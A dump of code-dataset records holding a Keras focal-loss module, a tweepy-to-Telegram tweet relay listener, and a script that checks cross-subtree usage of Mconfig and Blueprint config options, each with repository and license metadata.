if len(tweet) == 0:
break
index = tweets.index(tweet) + 1
print "tweet %s: " % index + tweet
f.close()
if __name__== "__main__":
main() | true |
5ad1a67b28d1ac9729393e365b7ec518af5f119c | Python | amogh7joshi/deeptoolkit | /deeptoolkit/losses.py | UTF-8 | 2,732 | 3.046875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding = utf-8 -*-
from __future__ import absolute_import
from tensorflow.keras.losses import Loss
import deeptoolkit.core.functional as F
from deeptoolkit.internal.conversion import apply_tensor_conversion
__all__ = ['BinaryFocalLoss', 'CategoricalFocalLoss']
class BinaryFocalLoss(Loss):
    """Keras-compatible binary focal loss (`Focal Loss for Dense Object
    Detection`, Lin et al.).

    Usage: call the instance directly on a (y_true, y_pred) pair, or pass
    it as the `loss` argument to `model.compile`:

    >>> bfl = BinaryFocalLoss()
    >>> loss_value = bfl([1, 2, 3, 4], [0.97, 2.6, 4.1, 2.9])

    >>> model.compile(optimizer='adam', loss=BinaryFocalLoss(),
    >>>               metrics=['accuracy'])

    Args (keyword-only):
        gamma: Focus parameter of the modulating factor.
        alpha: Weighting factor applied in the cross-entropy term.

    `call` returns a 1-dimensional Tensor containing the loss value.
    """

    def __init__(self, *, gamma=2.0, alpha=0.25):
        super().__init__()
        self.gamma = gamma
        self.alpha = alpha

    @apply_tensor_conversion
    def call(self, y_true, y_pred):
        # Delegate the actual computation to the functional backend.
        return F.binary_focal_loss(y_true, y_pred, gamma=self.gamma, alpha=self.alpha)
class CategoricalFocalLoss(Loss):
    """Keras-compatible categorical focal loss (`Focal Loss for Dense
    Object Detection`, Lin et al.).

    Usage: call the instance directly on a (y_true, y_pred) pair, or pass
    it as the `loss` argument to `model.compile`:

    >>> cfl = CategoricalFocalLoss()
    >>> loss_value = cfl([1, 2, 3, 4], [0.86, 2.1, 4.9, 3.6])

    >>> model.compile(optimizer='adam', loss=CategoricalFocalLoss(),
    >>>               metrics=['accuracy'])

    Args (keyword-only):
        gamma: Focus parameter of the modulating factor.
        alpha: Weighting factor applied in the cross-entropy term.

    `call` returns a 1-dimensional Tensor containing the loss value.
    """

    def __init__(self, *, gamma=2.0, alpha=0.25):
        super().__init__()
        self.gamma = gamma
        self.alpha = alpha

    @apply_tensor_conversion
    def call(self, y_true, y_pred):
        # Delegate the actual computation to the functional backend.
        return F.categorical_focal_loss(y_true, y_pred, gamma=self.gamma, alpha=self.alpha)
| true |
0700e3f776a227a1e83b97da0807bfe378b9ebd9 | Python | 5l1v3r1/feh_bot | /tweet_listener.py | UTF-8 | 1,350 | 2.75 | 3 | [
"MIT"
] | permissive | import tweepy
import time
import telegram
#TODO: may need to figure out if external class can be used or not, need the list of chats and stuff
# Listener for Twitter, overrides tweepy's StreamListener to provide
# functionality for telegram
class TweetStreamListener(tweepy.StreamListener):
    """Stream listener that relays tweets to subscribed Telegram chats.

    chat_map maps a tweet author to the Telegram chat ids following that
    account.  NOTE(review): status.author is a tweepy User object --
    confirm the map is keyed on the same value the stream yields.
    """

    def __init__(self, twitter, bot, chat_map, time_limit=60):
        """Keep the Twitter API handle, the Telegram bot, the
        subscription map, and a wall-clock cutoff for streaming."""
        self.api = twitter
        self.telegram = bot
        self.chat_map = chat_map
        self.limit = time.time() + time_limit

    def on_status(self, status):
        """Forward the tweet text to every subscribed chat; keep the
        stream alive only until the time limit elapses."""
        for chat_id in self.chat_map[status.author]:
            self.telegram.send_message(chat_id, status.text)
        return time.time() < self.limit

    def on_error(self, status_code):
        """Stay connected only on HTTP 420 (rate limiting); any other
        error code disconnects the stream."""
        return status_code == 420

    def update(self, account, id):
        """Subscribe a Telegram chat id to an account's tweets."""
        self.chat_map[account].append(id)

    def get_chat_map(self):
        """Return the account -> chat ids subscription map."""
        return self.chat_map
#print(bot.get_me()) | true |
26fe0e5fe2c16088f2b2404755cfde1aaf4992f3 | Python | ARM-software/bob-build | /scripts/check_config_usage.py | UTF-8 | 5,676 | 2.875 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python3
import argparse
import fnmatch
import os
import re
import sys
class Configs:
    """Registry of config options and where each one is defined."""

    def __init__(self):
        # Per-instance storage.  This used to be a *class* attribute, so
        # every Configs instance silently shared one dictionary.
        self._configs = dict()

    # Support the in keyword
    def __contains__(self, key):
        return key in self._configs

    # Record a new config definition site
    def append(self, config, file, line):
        self._configs[config] = {"file": file, "line": line}

    # Return a view of all recorded config names
    def keys(self):
        return self._configs.keys()

    # Return the file where a config is defined
    def file(self, config):
        return self._configs[config]["file"]

    # Print one CSV issue row to stdout:
    # config, referencing file/line, defining file/line, issue type
    def print_issue(self, type, config, file, line):
        print(
            "%s,%s,%d,%s,%d,%s"
            % (
                config,
                file,
                line,
                self._configs[config]["file"],
                self._configs[config]["line"],
                type,
            )
        )
# Find files matching pattern under the directory top
# Returns a list of filenames (which include top as prefix)
def find_files(top, pattern):
    """Recursively collect file paths under `top` matching glob `pattern`.

    Each returned path includes `top` as a prefix.
    """
    return [
        os.path.join(dirpath, filename)
        for dirpath, _dirnames, filenames in os.walk(top)
        for filename in fnmatch.filter(filenames, pattern)
    ]
# b is in the same subtree as a
#
# Assumes no symlinks. If a and b are relative, they are from the same
# starting location.
def same_subtree(a, b):
dira = os.path.dirname(a)
dirb = os.path.dirname(b)
return dirb.startswith(dira)
# Collect all definitions in all Mconfigs
# Returns a dictionary with each config as key
def get_config_definitions(mconfigs):
    """Scan every Mconfig for `config NAME` definition lines.

    Returns a Configs registry recording each option and the file/line
    where it was first defined; duplicates are reported on stderr and the
    first definition wins.
    """
    configs = Configs()
    definition = re.compile(r"^config ([A-z_][A-z0-9_]*)")
    for mconfig in mconfigs:
        with open(mconfig, "r") as handle:
            for lineno, line in enumerate(handle, 1):
                match = definition.match(line)
                if not match:
                    continue
                key = match.group(1)
                if key in configs:
                    msg = "Error %s already defined in %s. Also in %s\n"
                    sys.stderr.write(msg % (key, configs.file(key), mconfig))
                else:
                    configs.append(key, mconfig, lineno)
    return configs
# Look for all occurrences of defined configs in Mconfig files.
def check_mconfig_refs(mconfigs, configs):
    """Report configs referenced from an Mconfig outside their own subtree.

    Text after '#' is treated as a comment and ignored.
    """
    keyre = str.join("|", configs.keys())
    # Both \b anchors must be in raw strings: the original trailing ")\b"
    # was a plain literal, so \b was a backspace character and the regex
    # could never match any reference.
    re_configs = re.compile(r"\b(" + keyre + r")\b")
    for mconfig in mconfigs:
        with open(mconfig, "r") as f:
            lineno = 0
            for line in f:
                lineno += 1
                # Strip out single line comments
                line = line.split("#")[0]
                for key in re_configs.findall(line):
                    if not same_subtree(configs.file(key), mconfig):
                        configs.print_issue("Mconfig", key, mconfig, lineno)
# Look for all occurrences of defined configs in Blueprint files.
# In blueprint the reference can only occur in a feature or a template
def check_blueprint_refs(blueprints, configs):
    """Report configs used by a Blueprint file outside their own subtree.

    A Blueprint references a config either as a feature block
    (`lower_name:`) or inside a template expression (`{{.lower_name}}`);
    both use the lower-cased option name.  Text after '//' is treated as
    a comment and ignored.
    """
    keyre = str.join("|", configs.keys()).lower()
    feature_pat = re.compile(r"[ \t]*(" + keyre + r")[ \t]*:")
    template_pat = re.compile(r"{{(?:.+ *)?\.(" + keyre + r")}}")
    for blueprint in blueprints:
        with open(blueprint, "r") as handle:
            for lineno, raw in enumerate(handle, 1):
                # Strip out single line comments
                code = raw.split("//")[0]
                feature = feature_pat.match(code)
                if feature:
                    key = feature.group(1).upper()
                    if not same_subtree(configs.file(key), blueprint):
                        configs.print_issue("bp feature", key, blueprint, lineno)
                for key in template_pat.findall(code):
                    key = key.upper()
                    if not same_subtree(configs.file(key), blueprint):
                        configs.print_issue("bp template", key, blueprint, lineno)
def main():
    """Command-line entry point.

    Scans a directory tree for Mconfig definitions, then reports every
    cross-subtree config reference as a comma-separated row on stdout.
    """
    summary = """
    Detect usage of config variables outside of the tree they are
    defined in. This script can be used to help detect potential
    issues if subtrees can be excluded.
    """
    epilog = """
    The output is comma separated text of with a header row describing
    the fields. The header row starts with '#' to allow sorting.
    """
    parser = argparse.ArgumentParser(description=summary, epilog=epilog)
    parser.add_argument(
        "path", nargs="?", default=os.getcwd(), help="Directory to scan"
    )
    parser.add_argument(
        "--nom", default=False, action="store_true", help="Don't check Mconfig files"
    )
    parser.add_argument(
        "--nob", default=False, action="store_true", help="Don't check Blueprint files"
    )
    args = parser.parse_args()

    # Index every config definition found in the tree's Mconfig files.
    mconfigs = find_files(args.path, "Mconfig")

    # Table header
    print("# Config, Referenced from, Ref line, Defined in, Def line, Type")

    defs = get_config_definitions(mconfigs)

    if not args.nom:
        # Cross-check references inside the Mconfig files themselves.
        check_mconfig_refs(mconfigs, defs)

    if not args.nob:
        # Blueprint (*.bp) files are checked against the same index.
        blueprints = find_files(args.path, "*.bp")
        check_blueprint_refs(blueprints, defs)


if __name__ == "__main__":
    main()
| true |